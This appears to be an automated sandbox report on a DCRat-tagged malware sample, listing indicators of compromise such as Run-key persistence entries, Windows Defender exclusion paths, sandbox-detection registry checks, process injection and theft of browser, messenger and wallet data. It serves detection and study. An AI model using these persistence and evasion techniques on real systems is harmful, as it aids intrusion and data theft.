dcrat | b2718252be051e7fbc18b319b31ef746d88407272473a465b673cea0de3c4aad

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Jezhesixiji.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	keygen-step-4 — копия.exe

Loads dropped DLL 64 IoCs

pid	Process
2412	rundll32.exe
3304	Install.tmp
5432	rundll32.exe
2156	SunLabsPlayer.exe
2156	SunLabsPlayer.exe
5372	c7ae36fa.exe
4800	powershell.exe
2156	SunLabsPlayer.exe
2156	SunLabsPlayer.exe
2156	SunLabsPlayer.exe
2156	SunLabsPlayer.exe
2156	SunLabsPlayer.exe
2156	SunLabsPlayer.exe
2156	SunLabsPlayer.exe
2156	SunLabsPlayer.exe
2156	SunLabsPlayer.exe
2156	SunLabsPlayer.exe
2156	SunLabsPlayer.exe
2156	SunLabsPlayer.exe
2156	SunLabsPlayer.exe
2156	SunLabsPlayer.exe
2156	SunLabsPlayer.exe
2156	SunLabsPlayer.exe
5592	rundll32.exe
4664	rundll32.exe
2156	SunLabsPlayer.exe
2156	SunLabsPlayer.exe
2156	SunLabsPlayer.exe
2156	SunLabsPlayer.exe
2156	SunLabsPlayer.exe
2156	SunLabsPlayer.exe
2156	SunLabsPlayer.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe
6116	lighteningplayer-cache-gen.exe

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DlRhNcvOzN = "0"	rundll32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\TEMP\ = "0"	rundll32.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Multimedia Platform\\Saevobazhode.exe\""	Ultra.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	5599.tmp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\waupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\waupdat3.exe"	5599.tmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gaoou.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1063

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg6_6asg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md1_1eaf.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
34	ip-api.com
85	api.ipify.org

Drops file in System32 directory 14 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\A17EJFC7.cookie	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 129F816A3276456A	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 9569A9CEE85CC57B	svchost.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\A17EJFC7.cookie	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\DlRhNcvOzN	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 3076 set thread context of 3368	3076	svchost.exe	80
PID 1772 set thread context of 5936	1772	5087.tmp.exe	110
PID 5172 set thread context of 4732	5172	5599.tmp.exe	109
PID 5172 set thread context of 5200	5172	5599.tmp.exe	113
PID 4244 set thread context of 4800	4244	toolspab1.exe	167
PID 2336 set thread context of 2840	2336	jiirbtd	216
PID 5860 set thread context of 5508	5860	jiirbtd	224
PID 4940 set thread context of 5580	4940	jiirbtd	232

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libntservice_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_asf_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\newgrounds.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libtdummy_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libavi_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\appletrailers.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.json	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_streams.luac	SunLabsPlayer.exe
File created	C:\Program Files\temp_files\bckf.fon	data_load.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\view.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\speaker-32.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\d3d11\libdirect3d11_filters_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Other-48.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\uninstall.exe	SunLabsPlayer.exe
File created	C:\Program Files\libEGL.dll	xiuhuali.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.json	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Audio-48.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\liboldrc_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libfingerprinter_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files\temp_files\cache.dat	data_load.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\main.css	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\mobile.css	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\00_musicbrainz.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_imem_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\js\ui.js	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\modules\host.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libasf_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_vc1_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libclone_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files\temp_files\DlRhNcvOzN.dll	data_load.exe
File opened for modification	C:\Program Files\install.dll	google-game.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\README.txt	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libdummy_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libnoseek_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Folder-48.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libadummy_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\sd\icecast.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libnfs_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmod_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsv_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_flac_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_window.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\vocaroo.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\mobile_view.html	SunLabsPlayer.exe
File opened for modification	C:\Program Files\temp_files\	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\modules\sandbox.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist_jstree.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libimage_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\libssp-0.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Back-48.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\luac.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\03_lastfm.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwasapi_plugin.dll	SunLabsPlayer.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2900	3860	WerFault.exe	219

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral7/files/0x000100000001ac77-335.dat	nsis_installer_2
behavioral7/files/0x000100000001ac77-334.dat	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 24 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jiirbtd
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	gairbtd
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jiirbtd
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jiirbtd
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	gairbtd
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	powershell.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	powershell.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	gairbtd
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jiirbtd
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jiirbtd
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jiirbtd
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c7ae36fa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	powershell.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jiirbtd
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	gairbtd
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jiirbtd
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	gairbtd
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	gairbtd
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	gairbtd
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jiirbtd
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c7ae36fa.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c7ae36fa.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	gairbtd
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	gairbtd

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	5087.tmp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	5087.tmp.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
5312	bitsadmin.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
5576	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A1702DF8-87C5-4C79-9AD1-9FED653A9D12}Machine\SOFTWARE\Policies	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A1702DF8-87C5-4C79-9AD1-9FED653A9D12}Machine	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A1702DF8-87C5-4C79-9AD1-9FED653A9D12}Machine\SOFTWARE\Policies\Microsoft	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	powershell.exe
